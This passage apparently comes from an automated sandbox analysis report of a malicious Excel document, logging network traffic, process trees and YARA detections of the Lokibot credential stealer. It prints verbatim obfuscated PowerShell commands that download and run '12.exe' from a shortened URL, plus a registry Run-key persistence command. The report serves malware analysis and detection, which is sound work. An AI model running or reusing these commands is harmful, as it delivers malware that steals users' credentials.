                                                                                        Jan 5, 2021 19:06:46.433970928 CET1272OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:46.523350954 CET1273INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:45 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        HTTPS Packets

                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                        Jan 5, 2021 19:05:20.849750996 CET104.22.0.232443192.168.2.2249165CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                        CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                                                        Code Manipulations

                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Start time:19:04:38
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                        Imagebase:0x13f7f0000
                                                                                        File size:27641504 bytes
                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:05:08
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        Imagebase:0x12a0000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:19:05:11
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0x4a4c0000
                                                                                        File size:302592 bytes
                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:05:11
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0x8f0000
                                                                                        File size:62464 bytes
                                                                                        MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:19:05:22
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:19:05:23
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:19:05:24
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Imagebase:0x250000
                                                                                        File size:64672 bytes
                                                                                        MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, Metadefender, Browse
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:19:05:31
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:19:05:33
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Imagebase:0x1230000
                                                                                        File size:64672 bytes
                                                                                        MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:moderate

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2108763846.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6525962c59d0852aa003f01279bcb25d2274035e8d4a888a1eb6a8af7a03c5c0
                                                                                          • Instruction ID: abd589814308dcc93c389d3395b8228bac3714ff962a6768df6893ae9e6d0e8e
                                                                                          • Opcode Fuzzy Hash: 6525962c59d0852aa003f01279bcb25d2274035e8d4a888a1eb6a8af7a03c5c0
                                                                                          • Instruction Fuzzy Hash: C3E02011719D0B0FFBD0666C684B7B473C1E754313F50007AE80DC2292DD69D98543C1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Execution Graph

                                                                                          Execution Coverage:28.7%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:19.8%
                                                                                          Total number of Nodes:91
                                                                                          Total number of Limit Nodes:8

                                                                                          Graph

                                                                                          execution_graph 6346 310e18 6348 310e35 6346->6348 6347 310fb7 6348->6347 6352 311df1 6348->6352 6356 311e78 6348->6356 6360 311e00 6348->6360 6354 311e11 6352->6354 6353 311e5b 6353->6348 6354->6353 6364 311f61 6354->6364 6357 311e88 6356->6357 6358 311efb 6357->6358 6359 311f61 2 API calls 6357->6359 6358->6348 6359->6357 6361 311e11 6360->6361 6362 311e5b 6361->6362 6363 311f61 2 API calls 6361->6363 6362->6348 6363->6361 6365 311f81 6364->6365 6366 311fcb 6365->6366 6368 312010 6365->6368 6366->6354 6370 31203a 6368->6370 6369 312108 6369->6365 6370->6369 6372 312f68 6370->6372 6374 312f6d 6372->6374 6373 313060 6373->6369 6374->6373 6377 317a70 6374->6377 6383 317a60 6374->6383 6378 317a7c 6377->6378 6389 317cf9 6378->6389 6384 317a7c 6383->6384 6387 317cf9 DeleteFileW 6384->6387 6385 317a8f 6388 318240 CopyFileExW 6385->6388 6386 317a96 6386->6374 6387->6385 6388->6386 6390 317d0c 6389->6390 6403 317db8 6390->6403 6407 317dc8 6390->6407 6391 317a8f 6394 318240 6391->6394 6395 318245 6394->6395 6415 31d3b8 6395->6415 6419 31d3a8 6395->6419 6396 318857 6397 317a96 6396->6397 6423 31f085 6396->6423 6427 31ef38 6396->6427 6431 31f0ef 6396->6431 6397->6374 6404 317de8 6403->6404 6411 312f5c 6404->6411 6408 317de8 6407->6408 6409 312f5c DeleteFileW 6408->6409 6410 317e1a 6409->6410 6410->6391 6412 317e80 DeleteFileW 6411->6412 6414 317e1a 6412->6414 6414->6391 6417 31d3e5 6415->6417 6416 31d4a0 6416->6396 6417->6416 6436 31e458 6417->6436 6420 31d3e5 6419->6420 6421 31d4a0 6420->6421 6422 31e458 CopyFileExW 6420->6422 6421->6396 6422->6421 6424 31efff 6423->6424 6453 31f138 6424->6453 6425 31f0d2 6425->6397 6429 31ef5f 6427->6429 6428 31efd1 6428->6397 6429->6428 6430 31f138 CopyFileExW 6429->6430 6430->6428 6432 31efff 6431->6432 6433 31f0fe 6431->6433 6435 31f138 CopyFileExW 6432->6435 6433->6397 6434 31f0d2 6434->6397 6435->6434 6438 31e485 6436->6438 6437 31e4c1 6437->6416 6438->6437 6441 31e4e0 6438->6441 6445 31e4d0 6438->6445 6442 31e4fa 6441->6442 6449 318234 6442->6449 6444 31e539 6444->6437 6446 31e4de 6445->6446 6447 318234 CopyFileExW 6446->6447 6448 31e539 6447->6448 6448->6437 6451 31e558 CopyFileExW 6449->6451 6452 31e80e 6451->6452 6454 31f16f 6453->6454 6455 31e4e0 CopyFileExW 6454->6455 6456 31f1d1 6455->6456 6456->6425 6460 311ca8 6462 311cd5 6460->6462 6461 311d2f 6462->6461 6463 311df1 2 API calls 6462->6463 6464 311e00 2 API calls 6462->6464 6463->6461 6464->6461 6465 313ac8 6466 313b15 VirtualProtect 6465->6466 6467 313b81 6466->6467

                                                                                          Executed Functions

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
